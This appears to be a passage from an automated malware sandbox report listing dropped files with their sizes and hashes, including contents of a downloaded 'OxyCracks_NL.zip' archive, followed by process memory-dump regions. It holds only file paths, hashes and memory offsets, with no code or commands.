2545bb454d0a972f1a7c688e2a5cd41ea81d3946

SHA256
23c08f69e5eaa3a4ab9cab287d7dc2a40aca048c8b3c89992cdb62d4de6eb01f

SHA512
2a8ed5a4143b3176e96d220f0255da32a139909dd49625ef839c2dfce46e45f11a0b7340eb60ad1f815a455333e45aece6e0d47a8b474419e3cbbbd46f01c062

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\base_library.zip

Filesize
1.4MB

MD5
6e706e4fa21d90109df6fce1b2595155

SHA1
5328dd26b361d36239facff79baca1bab426de68

SHA256
ce9b9f16ce0d9abdbac3307115d91eaf279c5152336ccbe8830151b41c802998

SHA512
c7e377e2854ad5b5c3fb23593817ad6345bf8a78d842ff2a45c3be135fad6bb27b67c5b6c01b26e7c1b1b12ea0814f4f6b6a522bbfa689b89fa50d3652799b34

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\blank.aes

Filesize
118KB

MD5
eaeb07ef0948a7707d3b2319b4fed14d

SHA1
c1c89128b43af6b4157b873e1e9a26a601567076

SHA256
e50f635db07a7fa0f58046d9e75a3424cd4c2bbb5b5e254c979d20c767739612

SHA512
f8d7bd932b0d868299ca8c18db5bd8d20b6e14da5f565eed149e6c7ba0b16e8b6fd9dcdf3232448b1de72a5329358ca6c6935284b4c1cf95ead03c9f6404a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\python311.dll

Filesize
1.1MB

MD5
c8cfd0ba25d1abd188bc9b0d55a5f7ac

SHA1
5f3069cd29e649304739213e9e9c482fc59ddf40

SHA256
a40c99628fcf5d6faeb86a2b541dda0025e44bd62297cd28fca867144a7429b0

SHA512
aaf88487dafca01fdcd8e2fc065bfcf7eaf92be1674531026e96b9a4eff6af47f7c036de9b62f8f574c3f7748b2a9df6192c6b9adaf0ff85491ccd43e6bd93e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\python311.dll

Filesize
256KB

MD5
5d5ace091bb5f669d038dfbf89d8c985

SHA1
5109ec39732a49172da71475fe0ab975572c0f2d

SHA256
408a2503f58d1a3de30264472b29b8d8911ec887b7a11c2e98a58ec9c0d61efa

SHA512
4f560b43e6cbc71793087c9f1aece0c62dec8fe8d06525d363470a58909c696b6d7cad1ba3e8dcdb46a31b16237dae20aebb80dde98fd1683bb458fcf521cc4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\select.pyd

Filesize
25KB

MD5
d76b7f6fd31844ed2e10278325725682

SHA1
6284b72273be14d544bb570ddf180c764cde2c06

SHA256
e46d0c71903db7d735cc040975bfc480dfea34b31b3e57b7dafa4c1f4058e969

SHA512
943ca5600f37cf094e08438e1f93b869f108abd556785e5d090051ed8cf003e85c1b380fc95f95bc871db59ffdd61099efa2e32d4354ca0cc70a789cf84abaa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\sqlite3.dll

Filesize
630KB

MD5
73b763cedf2b9bdcb0691fb846894197

SHA1
bf2a9e88fba611c2e779ead1c7cfd10d7f4486b2

SHA256
e813695191510bf3f18073491dc0ea1b760bc22c334eefe0e97312810de5d8d5

SHA512
617cb2b6027a3aba009bb9946347c4e282dd50d38ca4764e819631feb3a7fd739fd458e67866f9f54b33b07645ca55229030860a4faab5f677866cfa4a1f7ee2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\sqlite3.dll

Filesize
64KB

MD5
6647713ad3df456870251f5bcfd32002

SHA1
00a4fe8c2ca3b9fb41d6e49a4c064abf78239f11

SHA256
143f5564a2c610de1537b58ece36084b6fca0fd8f43ecbf13ca7e8eeb79b647c

SHA512
e3ee16e2a6c870f5536d791166fd91039cc91755846390114b4e7dce79e40ae74b8c26db62fac34a0c045fe576e30d53626d24770def8713fb7e6f4b2daf57f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35882\unicodedata.pyd

Filesize
295KB

MD5
6873de332fbf126ddb53b4a2e33e35a5

SHA1
93748c90cd93fda83fcd5bb8187eeaf6b67a2d08

SHA256
f5631d92e9da39a6a1e50899d716eac323829d423a7f7fa21bd5061232564370

SHA512
0e03ba8c050aeadf88c390e5ea5e8e278f873885c970b67d5bc0675d782233a2925e753dae151c7af9976f64c42eba04a4dcec86204e983f6f6f2788a928401c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\blank.aes

Filesize
118KB

MD5
113c6f0709165df7b416c7a9ef54e42f

SHA1
8415f7d5ccd1fa2def4e1afe5218338e12d4b826

SHA256
1c03e11dd9e6a20046ff26e3fce06cb7f58ef9343e3d0e110686d3f46c6b5aac

SHA512
700ff1143418debdccb1a03c7b2df0cdae79201e83e14a2835e8854f1b40f59ede8a915e865419ad642846fc83b0c17f419b00d37abc314065a7e8fbeda0f0c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yt41y1ad.ayz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9A18.tmp.dat

Filesize
92KB

MD5
c2515561b9dd345db98ed9d4fc658338

SHA1
f403e9444049165bd5f3e3176d76a39eeaebf211

SHA256
38f56b30db83047d4568ca521650ee4bcfc8a19ef972735f9dd53ebfa17881cf

SHA512
3cfd530e47ef80e73d8b92501e54ef66b961eaafbc379d013b20a71701abe5bea0caab9bd932a8769fdb2e15ac70320df9025f75ad4adc83bec8790ee96ffaa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9A2B.tmp.dat

Filesize
64KB

MD5
a3545088c55f94b4af8033b7a971b81c

SHA1
72a0ff33519792a3778974c180c52f7b51d14d57

SHA256
10a521330fd5c6d2fbe9262721aa37820e10dc41efc57f394bbad203498c285c

SHA512
47ee1ac5653d0d886d11ead6563b8bdfdafced08ba56941aeccbc0632de20da371747a0811a52fbe259401a4287ed53db63ffb1dcdc3dbd1ae8f0b5078dc357b

Download Submit
C:\Users\Admin\AppData\Roaming\app

Filesize
4B

MD5
399f38fdf7aaf217d0b32896af9f298c

SHA1
db37bfb5bd821b9068587df50d57b38f0287d760

SHA256
c4814a00866e93627816b8987550d30010a862936285a5ceb656f06b6d285b46

SHA512
0130418d2e5bbe23e1a796ea11be0abdd639ae4ab36eae64ab0404984c1b0928a95fb14ee5444b0681e6e0eb23911fe3ac619137ed0241ae60cf1d8c8672d179

Download Submit
C:\Users\Admin\Downloads\OxyCracks_NL.zip

Filesize
7.7MB

MD5
c0c4fb82443a571255c910262d7cf4d0

SHA1
8cb29cf457c8237774627ca58148a39bbf899ae7

SHA256
03ab73f7daea7657290ea1b61657ce07c8f98c1e743e3006052214294bebf401

SHA512
5072fcd961b9db88c201c9b82bb391b355d403b5a602747f3315b099668ba775e78715af99fa6b6db528514cd95adc8e3451cd35fd87cb30ca2d92f60530824e

Download Submit
C:\Users\Admin\Downloads\OxyCracks_NL\OxyCracks NL\NL By Oxy.exe

Filesize
8.0MB

MD5
0fa734c12c775665eef35bd81657bc2c

SHA1
0a865ce1dcda1602ac25c120e15752b430744908

SHA256
3b12897906c0bed01a985254c1a6ea59081ba743c4e498347dc0f9e2d6e122d2

SHA512
b3bd6c4cb5bfd599b558a559a422dceed426948facb35acf70a39a466c7dd334ba6148869a042c38ef7f0c0cc45a5c1618b884ed911a123b2aa258faca5a0493

Download Submit
memory/868-250-0x000002CF59460000-0x000002CF59470000-memory.dmp

Filesize
64KB

Download
memory/868-131-0x000002CF57810000-0x000002CF5785A000-memory.dmp

Filesize
296KB

Download
memory/868-204-0x00007FFA70D00000-0x00007FFA717C1000-memory.dmp

Filesize
10.8MB

Download
memory/868-464-0x00007FFA70D00000-0x00007FFA717C1000-memory.dmp

Filesize
10.8MB

Download
memory/1060-232-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/1060-737-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/1060-208-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/1060-209-0x0000000000A60000-0x0000000000A70000-memory.dmp

Filesize
64KB

Download
memory/1060-749-0x0000000000A60000-0x0000000000A70000-memory.dmp

Filesize
64KB

Download
memory/1060-748-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/2604-282-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/2604-240-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/2604-236-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/2604-239-0x0000000000890000-0x00000000008A0000-memory.dmp

Filesize
64KB

Download
memory/3052-899-0x00007FFA73600000-0x00007FFA7362D000-memory.dmp

Filesize
180KB

Download
memory/3052-907-0x00007FFA73120000-0x00007FFA731ED000-memory.dmp

Filesize
820KB

Download
memory/3052-741-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp

Filesize
5.9MB

Download
memory/3052-903-0x00007FFA75FC0000-0x00007FFA75FD9000-memory.dmp

Filesize
100KB

Download
memory/3052-735-0x00007FFA8DEB0000-0x00007FFA8DEBF000-memory.dmp

Filesize
60KB

Download
memory/3052-898-0x00007FFA8DEB0000-0x00007FFA8DEBF000-memory.dmp

Filesize
60KB

Download
memory/3052-912-0x00007FFA73000000-0x00007FFA7311C000-memory.dmp

Filesize
1.1MB

Download
memory/3052-909-0x00007FFA841F0000-0x00007FFA841FD000-memory.dmp

Filesize
52KB

Download
memory/3052-908-0x00007FFA738D0000-0x00007FFA738E4000-memory.dmp

Filesize
80KB

Download
memory/3052-896-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp

Filesize
5.9MB

Download
memory/3052-906-0x00007FFA693D0000-0x00007FFA698F9000-memory.dmp

Filesize
5.2MB

Download
memory/3052-904-0x00007FFA84E70000-0x00007FFA84E7D000-memory.dmp

Filesize
52KB

Download
memory/3052-905-0x00007FFA73590000-0x00007FFA735C3000-memory.dmp

Filesize
204KB

Download
memory/3052-902-0x00007FFA731F0000-0x00007FFA73366000-memory.dmp

Filesize
1.5MB

Download
memory/3052-900-0x00007FFA84CF0000-0x00007FFA84D09000-memory.dmp

Filesize
100KB

Download
memory/3052-743-0x00007FFA73950000-0x00007FFA73974000-memory.dmp

Filesize
144KB

Download
memory/3052-897-0x00007FFA73950000-0x00007FFA73974000-memory.dmp

Filesize
144KB

Download
memory/3052-901-0x00007FFA735D0000-0x00007FFA735F3000-memory.dmp

Filesize
140KB

Download
memory/3468-694-0x0000026AC0400000-0x0000026AC0410000-memory.dmp

Filesize
64KB

Download
memory/3468-740-0x00007FFA70E20000-0x00007FFA718E1000-memory.dmp

Filesize
10.8MB

Download
memory/3540-286-0x00007FFA6EEC0000-0x00007FFA6EEE4000-memory.dmp

Filesize
144KB

Download
memory/3540-253-0x00007FFA894A0000-0x00007FFA894AF000-memory.dmp

Filesize
60KB

Download
memory/3540-481-0x00007FFA75FC0000-0x00007FFA75FD9000-memory.dmp

Filesize
100KB

Download
memory/3540-482-0x00007FFA84F90000-0x00007FFA84F9D000-memory.dmp

Filesize
52KB

Download
memory/3540-483-0x00007FFA6C7D0000-0x00007FFA6C803000-memory.dmp

Filesize
204KB

Download
memory/3540-485-0x00007FFA6BC80000-0x00007FFA6BD4D000-memory.dmp

Filesize
820KB

Download
memory/3540-412-0x00007FFA6BB60000-0x00007FFA6BC7C000-memory.dmp

Filesize
1.1MB

Download
memory/3540-293-0x00007FFA6C7D0000-0x00007FFA6C803000-memory.dmp

Filesize
204KB

Download
memory/3540-479-0x00007FFA6E830000-0x00007FFA6E853000-memory.dmp

Filesize
140KB

Download
memory/3540-488-0x00007FFA6BB60000-0x00007FFA6BC7C000-memory.dmp

Filesize
1.1MB

Download
memory/3540-278-0x00007FFA84E70000-0x00007FFA84E7D000-memory.dmp

Filesize
52KB

Download
memory/3540-274-0x00007FFA6BC80000-0x00007FFA6BD4D000-memory.dmp

Filesize
820KB

Download
memory/3540-269-0x00007FFA693D0000-0x00007FFA698F9000-memory.dmp

Filesize
5.2MB

Download
memory/3540-478-0x00007FFA762D0000-0x00007FFA762E9000-memory.dmp

Filesize
100KB

Download
memory/3540-477-0x00007FFA6EE90000-0x00007FFA6EEBD000-memory.dmp

Filesize
180KB

Download
memory/3540-476-0x00007FFA894A0000-0x00007FFA894AF000-memory.dmp

Filesize
60KB

Download
memory/3540-467-0x00007FFA6EEC0000-0x00007FFA6EEE4000-memory.dmp

Filesize
144KB

Download
memory/3540-480-0x00007FFA6D5B0000-0x00007FFA6D726000-memory.dmp

Filesize
1.5MB

Download
memory/3540-465-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp

Filesize
5.9MB

Download
memory/3540-296-0x00007FFA6D590000-0x00007FFA6D5A4000-memory.dmp

Filesize
80KB

Download
memory/3540-290-0x00007FFA75FC0000-0x00007FFA75FD9000-memory.dmp

Filesize
100KB

Download
memory/3540-484-0x00007FFA693D0000-0x00007FFA698F9000-memory.dmp

Filesize
5.2MB

Download
memory/3540-255-0x00007FFA762D0000-0x00007FFA762E9000-memory.dmp

Filesize
100KB

Download
memory/3540-260-0x00007FFA6E830000-0x00007FFA6E853000-memory.dmp

Filesize
140KB

Download
memory/3540-487-0x00007FFA84E70000-0x00007FFA84E7D000-memory.dmp

Filesize
52KB

Download
memory/3540-261-0x00007FFA6D5B0000-0x00007FFA6D726000-memory.dmp

Filesize
1.5MB

Download
memory/3540-289-0x00007FFA6EE90000-0x00007FFA6EEBD000-memory.dmp

Filesize
180KB

Download
memory/3540-284-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp

Filesize
5.9MB

Download
memory/3540-292-0x00007FFA84F90000-0x00007FFA84F9D000-memory.dmp

Filesize
52KB

Download
memory/3540-486-0x00007FFA6D590000-0x00007FFA6D5A4000-memory.dmp

Filesize
80KB

Download
memory/3624-283-0x0000000000770000-0x0000000000780000-memory.dmp

Filesize
64KB

Download
memory/3624-143-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/3624-241-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/3624-285-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/4424-730-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/4424-734-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/4424-732-0x00000000005A0000-0x00000000005B0000-memory.dmp

Filesize
64KB

Download
memory/4508-291-0x0000000000B60000-0x0000000000B70000-memory.dmp

Filesize
64KB

Download
memory/4508-415-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/4508-295-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/4980-636-0x00000000009F0000-0x0000000000A00000-memory.dmp

Filesize
64KB

Download
memory/4980-287-0x00000000009F0000-0x0000000000A00000-memory.dmp

Filesize
64KB

Download
memory/4980-288-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/4980-414-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5828-671-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5828-658-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5828-669-0x0000000000B20000-0x0000000000B30000-memory.dmp

Filesize
64KB

Download
memory/5828-738-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5972-709-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5972-742-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5972-729-0x0000000073A10000-0x0000000073FC1000-memory.dmp

Filesize
5.7MB

Download
memory/5972-728-0x00000000007F0000-0x0000000000800000-memory.dmp

Filesize
64KB

Download
memory/6032-634-0x00007FFA70D00000-0x00007FFA717C1000-memory.dmp

Filesize
10.8MB

Download
memory/6032-418-0x00000159F0540000-0x00000159F0550000-memory.dmp

Filesize
64KB

Download
memory/6032-419-0x00000159F0540000-0x00000159F0550000-memory.dmp

Filesize
64KB

Download
memory/6032-420-0x00007FFA70D00000-0x00007FFA717C1000-memory.dmp

Filesize
10.8MB

Download
memory/6048-416-0x00007FFA70D00000-0x00007FFA717C1000-memory.dmp

Filesize
10.8MB

Download
memory/6048-417-0x000001B9E9F50000-0x000001B9E9F60000-memory.dmp

Filesize
64KB

Download
memory/6048-426-0x000001B9E9910000-0x000001B9E9932000-memory.dmp

Filesize
136KB

Download
memory/6048-635-0x00007FFA70D00000-0x00007FFA717C1000-memory.dmp

Filesize
10.8MB

Download